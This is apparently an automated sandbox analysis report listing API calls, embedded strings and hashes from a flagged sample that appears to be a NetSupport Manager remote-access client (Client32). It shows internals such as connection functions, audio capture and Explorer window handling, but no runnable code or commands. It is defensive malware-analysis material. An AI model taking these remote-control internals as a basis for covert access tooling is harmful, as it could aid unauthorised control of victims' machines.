                                                                                        • Part of subcall function 11091620: UpdateWindow.USER32(?), ref: 110916BF
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093111
                                                                                        • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110916EA
                                                                                        • Part of subcall function 110916D0: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093120,?,00000000,?,00000000), ref: 11091717
                                                                                        • Part of subcall function 110916D0: TranslateMessage.USER32(?), ref: 11091721
                                                                                        • Part of subcall function 110916D0: DispatchMessageA.USER32(?), ref: 1109172B
                                                                                        • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1109173B
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093135
                                                                                        • Part of subcall function 11091590: GlobalDeleteAtom.KERNEL32(00000000), ref: 110915CE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                      • String ID: NSMClassList$NSMFindClassEvent
                                                                                      • API String ID: 1622498684-2883797795
                                                                                      • Opcode ID: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                      • Instruction ID: dc520b378aeee27ae2973ce0394f0415fb857a8947d0a09b3e9437a491b5cd63
                                                                                      • Opcode Fuzzy Hash: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                      • Instruction Fuzzy Hash: 7111E976F4821D77EB00A6B51C69F6FBADC5B847A8F001024F92DD62C4EF14E401A7A6
                                                                                      APIs
                                                                                        • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                        • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                      • _memset.LIBCMT ref: 1115B266
                                                                                      • SendMessageA.USER32(?,000005FF,00000000,00000000), ref: 1115B29C
                                                                                      • ShowWindow.USER32(?,00000006,?,?,?,?,?), ref: 1115B2AC
                                                                                      • GetDesktopWindow.USER32 ref: 1115B309
                                                                                      • TileWindows.USER32(00000000,?,?,?,?), ref: 1115B310
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window_memset$DesktopMessageSendShowTileVersionWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2935161463-0
                                                                                      • Opcode ID: a7205b1e4ecbd9aa5000b534947fd741d9615ccee10b4499b543e29c859a81cd
                                                                                      • Instruction ID: b14402a4e76bbdd80eea2f1b3df88d79255beb3666519cd349b4ccd6d2fbdf9c
                                                                                      • Opcode Fuzzy Hash: a7205b1e4ecbd9aa5000b534947fd741d9615ccee10b4499b543e29c859a81cd
                                                                                      • Instruction Fuzzy Hash: 39410271A00205ABEB809F64CDC5B6EF7B9FF46354F104065E925EB280DB70E940CFA9
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_version), ref: 11063177
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_installed), ref: 1106319C
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_netname), ref: 110631C2
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_remotename), ref: 110631E8
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_bridgename), ref: 1106320E
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_networks), ref: 11063234
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_pingnet), ref: 1106325A
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_open), ref: 11063280
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_close), ref: 110632A6
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getsession), ref: 110632F2
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_call), ref: 11063318
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_hangup), ref: 1106333E
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_nsessions), ref: 11063364
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_connected), ref: 1106338A
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_send), ref: 110633B0
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendex), ref: 110633D6
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendif), ref: 110633EB
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendto), ref: 11063411
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_subset), ref: 1106341C
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_helpreq), ref: 11063468
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_maxpacket), ref: 1106348E
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_openremote), ref: 110634B4
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_closeremote), ref: 110634DA
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_callremote), ref: 11063500
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_pause), ref: 11063442
                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_findslaves), ref: 110632CC
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_myaddr), ref: 11063526
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_loadbridge), ref: 11063531
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getfailedreason), ref: 1106353C
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_escape), ref: 11063547
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_publishservice), ref: 11063552
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_publishserviceex), ref: 1106355D
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_findslavesex), ref: 1106356B
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_broadcastdata), ref: 11063576
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendname), ref: 11063584
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getlocalipaddressinuse), ref: 11063592
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_clientpinrequest), ref: 110635A0
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_controlsendpin), ref: 110635AE
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_controlpinrequest), ref: 110635BC
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_clearpin), ref: 110635CA
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getcodepage), ref: 110635D8
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getconnectivityinfo), ref: 110635E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ExitProcess$ErrorLastMessage_strrchrwsprintf
                                                                                      • String ID: ..\ctl32\Connect.cpp$ctl_bridgename$ctl_broadcastdata$ctl_call$ctl_callremote$ctl_clearpin$ctl_clientpinrequest$ctl_close$ctl_closeremote$ctl_connected$ctl_controlpinrequest$ctl_controlsendpin$ctl_escape$ctl_findslaves$ctl_findslavesex$ctl_getcodepage$ctl_getconnectivityinfo$ctl_getfailedreason$ctl_getlocalipaddressinuse$ctl_getsession$ctl_hangup$ctl_helpreq$ctl_installed$ctl_loadbridge$ctl_maxpacket$ctl_myaddr$ctl_netname$ctl_networks$ctl_nsessions$ctl_open$ctl_openremote$ctl_pause$ctl_pingnet$ctl_publishservice$ctl_publishserviceex$ctl_remotename$ctl_send$ctl_sendex$ctl_sendif$ctl_sendname$ctl_sendto$ctl_subset$ctl_version
                                                                                      • API String ID: 1096595926-1306570422
                                                                                      • Opcode ID: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                      • Instruction ID: 5f24de0e2360826035fa82522da9b4a10218173402b610a7b1cd1951dc97c3b7
                                                                                      • Opcode Fuzzy Hash: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                      • Instruction Fuzzy Hash: 96A15DBCF447927AD312AFB76C91FABFEE86F615D8B81042AF449E5901FA60F000C556
                                                                                      APIs
                                                                                        • Part of subcall function 1105DE40: __itow.LIBCMT ref: 1105DE65
                                                                                      • GetObjectA.GDI32(?,0000003C,?), ref: 11005435
                                                                                        • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                        • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                      • wsprintfA.USER32 ref: 1100548D
                                                                                      • DeleteObject.GDI32(?), ref: 110054E2
                                                                                      • DeleteObject.GDI32(?), ref: 110054EB
                                                                                      • SelectObject.GDI32(?,?), ref: 11005502
                                                                                      • DeleteObject.GDI32(?), ref: 11005508
                                                                                      • DeleteDC.GDI32(?), ref: 1100550E
                                                                                      • SelectObject.GDI32(?,?), ref: 1100551F
                                                                                      • DeleteObject.GDI32(?), ref: 11005528
                                                                                      • DeleteDC.GDI32(?), ref: 1100552E
                                                                                      • DeleteObject.GDI32(?), ref: 1100553F
                                                                                      • DeleteObject.GDI32(?), ref: 1100556A
                                                                                      • DeleteObject.GDI32(?), ref: 11005588
                                                                                      • DeleteObject.GDI32(?), ref: 11005591
                                                                                      • ShowWindow.USER32(?,00000009), ref: 110055BF
                                                                                      • PostQuitMessage.USER32(00000000), ref: 110055C7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                      • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                      • API String ID: 2789700732-770455996
                                                                                      • Opcode ID: 545b59c5a20981a964d2566c076ce67725319314088b52aa60ee8a5e99a3c4b0
                                                                                      • Instruction ID: d9229358f4933b228272336fa2bf33a0883a331572b372d30b0232039735f129
                                                                                      • Opcode Fuzzy Hash: 545b59c5a20981a964d2566c076ce67725319314088b52aa60ee8a5e99a3c4b0
                                                                                      • Instruction Fuzzy Hash: 5C816975A00609AFD728DBB5C990EABF7F9BF8C304F00451DE6A697680DA75F801CB60
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • wsprintfA.USER32 ref: 110EB1B8
                                                                                      • GetTickCount.KERNEL32 ref: 110EB212
                                                                                      • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
                                                                                      • GetTickCount.KERNEL32 ref: 110EB22E
                                                                                      • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
                                                                                      • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
                                                                                      • SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                      • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                      • API String ID: 3451743168-2289091950
                                                                                      • Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                      • Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
                                                                                      • Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                      • Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • _malloc.LIBCMT ref: 1100B366
                                                                                        • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                        • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                        • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                        • Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,A1BC2D8B,?,00000000,00000000), ref: 1100AC84
                                                                                        • Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
                                                                                        • Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACEE
                                                                                        • Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD35
                                                                                        • Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3C
                                                                                        • Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
                                                                                        • Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
                                                                                        • Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75
                                                                                      • EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,A1BC2D8B,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
                                                                                      • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
                                                                                      • _calloc.LIBCMT ref: 1100B3E9
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
                                                                                      • LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
                                                                                      • LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E
                                                                                      Strings
                                                                                      • Vista new pAudioCap=%p, xrefs: 1100B4D3
                                                                                      • \\.\NSAudioFilter, xrefs: 1100B3B0
                                                                                      • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
                                                                                      • InitCaptureSounds NT6, xrefs: 1100B48E
                                                                                      • Audio, xrefs: 1100B347
                                                                                      • Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3
                                                                                      • DisableSounds, xrefs: 1100B342
                                                                                      • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                      • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                      • API String ID: 1843377891-2362500394
                                                                                      • Opcode ID: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                      • Instruction ID: 3f9b0c4355a442be161718b687c517c7c1a8a488e2b9041c50d9e3709ff29e90
                                                                                      • Opcode Fuzzy Hash: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                      • Instruction Fuzzy Hash: 8E51D9B5E0464AAFE704CF74DC80BAEF7A4FB04759F10467AE929A3240E7717550C7A1
                                                                                      APIs
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • GetLastError.KERNEL32(?), ref: 1102B331
                                                                                      • GetLastError.KERNEL32(?), ref: 1102B38E
                                                                                      • _fgets.LIBCMT ref: 1102B3C0
                                                                                      • _strtok.LIBCMT ref: 1102B3E8
                                                                                        • Part of subcall function 11163016: __getptd.LIBCMT ref: 11163034
                                                                                      • _fgets.LIBCMT ref: 1102B424
                                                                                      • _strtok.LIBCMT ref: 1102B438
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                      • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                      • API String ID: 78526175-1484737611
                                                                                      • Opcode ID: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                      • Instruction ID: 83a04ffa2f5f23a923324f4189043cfd8b751997b231b4d3af7dc0cd534076c2
                                                                                      • Opcode Fuzzy Hash: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                      • Instruction Fuzzy Hash: 2E81B675D00A1E9BDB10DBA4CC80FEEB7B9AF44309F4440D8E919A7245EA75AB84CF91
                                                                                      APIs
                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,A1BC2D8B,00000000,00000000,00000000), ref: 1103119A
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • EnumWindows.USER32(110301B0,00000001), ref: 11031272
                                                                                      • EnumWindows.USER32(110301B0,00000000), ref: 110312CC
                                                                                      • Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 110312DC
                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 11031313
                                                                                        • Part of subcall function 11027E50: _memset.LIBCMT ref: 11027E85
                                                                                        • Part of subcall function 11027E50: wsprintfA.USER32 ref: 11027EBA
                                                                                        • Part of subcall function 11027E50: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EFF
                                                                                        • Part of subcall function 11027E50: GetExitCodeProcess.KERNEL32(?,?), ref: 11027F13
                                                                                        • Part of subcall function 11027E50: CloseHandle.KERNEL32(?,00000000), ref: 11027F45
                                                                                        • Part of subcall function 11027E50: CloseHandle.KERNEL32(?), ref: 11027F4E
                                                                                      • Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 1103132B
                                                                                      • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 110313E7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                      • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                      • API String ID: 3887438110-1852639040
